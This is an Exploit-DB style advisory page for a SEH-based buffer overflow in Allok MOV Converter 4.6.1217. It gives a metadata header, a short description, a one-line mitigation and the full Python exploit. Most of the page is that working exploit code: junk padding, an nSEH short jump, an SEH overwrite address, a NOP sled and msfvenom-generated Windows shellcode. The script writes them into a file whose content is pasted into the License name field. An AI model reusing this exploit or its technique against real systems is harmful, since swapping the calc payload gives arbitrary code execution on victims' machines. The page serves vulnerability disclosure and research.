Allok MOV Converter 4.6.1217 - Buffer Overflow (SEH)

vendor:

Allok MOV Converter

by:

Shubham Singh

7.5

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: Allok MOV Converter

Affected Version From: 4.6.1217

Affected Version To: 4.6.1217

Patch Exists: NO

Related CWE:

CPE: a:alloksoft:allok_mov_converter:4.6.1217

Metasploit:

Other Scripts:

Platforms Tested: Windows XP Service Pack 3 x86

2018

Allok MOV Converter 4.6.1217 – Buffer Overflow (SEH)

This exploit takes advantage of a buffer overflow vulnerability in Allok MOV Converter 4.6.1217. By running the python exploit script, a new file named 'exploit.txt' is created. The content of 'exploit.txt' is then pasted into the License name field of the Allok MOV Converter program, triggering the buffer overflow and causing a calculator to pop up.

Mitigation:

Apply the latest patch from the vendor. Do not download or open files from untrusted sources.

Source

Exploit-DB raw data:

# Exploit Title: Allok MOV Converter 4.6.1217 - Buffer Overflow (SEH)
# Date: 2018-07-29
# Discovery by: Shubham Singh
# Known As: Spirited Wolf [Twitter: @Pwsecspirit]
# Software Link: http://www.alloksoft.com/allok_movconverter.exe
# Tested Version: 4.6.1217
# Tested on OS: Windows XP Service Pack 3 x86
# Greetz: @hexachordanu @FuzzySec @LiveOverflow

# Steps to Reproduce: Run the python exploit script, it will create a new 
# file with the name "exploit.txt" just copy the text inside "exploit.txt"
# Start the Allok MOV Converter 4.6.1217 program and in the Lisence name paste the content of "exploit.txt" and click on Register.
# You will see a sweet calculator poped up.

file = open("exploit.txt","wb")
junk = "\x41" * 780
nseh = "\xeb\x10\x90\x90" #Short Jump address
seh = "\x79\x25\x01\x76"  #0x76012579

nops = "\x90" * 16

#badchar \x00\x08\x09\x0a\x0b\x0c\x0d
#msfvenom -p windows/exec CMD=calc.exe -b '\x00\x08\x09\x0a\x0b\x0c\x0d' -f python
buf =  ""
buf += "\xba\xbb\xf0\xaa\x11\xdd\xc3\xd9\x74\x24\xf4\x5e\x31"
buf += "\xc9\xb1\x31\x83\xee\xfc\x31\x56\x0f\x03\x56\xb4\x12"
buf += "\x5f\xed\x22\x50\xa0\x0e\xb2\x35\x28\xeb\x83\x75\x4e"
buf += "\x7f\xb3\x45\x04\x2d\x3f\x2d\x48\xc6\xb4\x43\x45\xe9"
buf += "\x7d\xe9\xb3\xc4\x7e\x42\x87\x47\xfc\x99\xd4\xa7\x3d"
buf += "\x52\x29\xa9\x7a\x8f\xc0\xfb\xd3\xdb\x77\xec\x50\x91"
buf += "\x4b\x87\x2a\x37\xcc\x74\xfa\x36\xfd\x2a\x71\x61\xdd"
buf += "\xcd\x56\x19\x54\xd6\xbb\x24\x2e\x6d\x0f\xd2\xb1\xa7"
buf += "\x5e\x1b\x1d\x86\x6f\xee\x5f\xce\x57\x11\x2a\x26\xa4"
buf += "\xac\x2d\xfd\xd7\x6a\xbb\xe6\x7f\xf8\x1b\xc3\x7e\x2d"
buf += "\xfd\x80\x8c\x9a\x89\xcf\x90\x1d\x5d\x64\xac\x96\x60"
buf += "\xab\x25\xec\x46\x6f\x6e\xb6\xe7\x36\xca\x19\x17\x28"
buf += "\xb5\xc6\xbd\x22\x5b\x12\xcc\x68\x31\xe5\x42\x17\x77"
buf += "\xe5\x5c\x18\x27\x8e\x6d\x93\xa8\xc9\x71\x76\x8d\x26"
buf += "\x38\xdb\xa7\xae\xe5\x89\xfa\xb2\x15\x64\x38\xcb\x95"
buf += "\x8d\xc0\x28\x85\xe7\xc5\x75\x01\x1b\xb7\xe6\xe4\x1b"
buf += "\x64\x06\x2d\x78\xeb\x94\xad\x51\x8e\x1c\x57\xae"

more = "\x41" * 100
exploit = junk + nseh + seh + nops + buf + more

file.write(exploit)
file.close()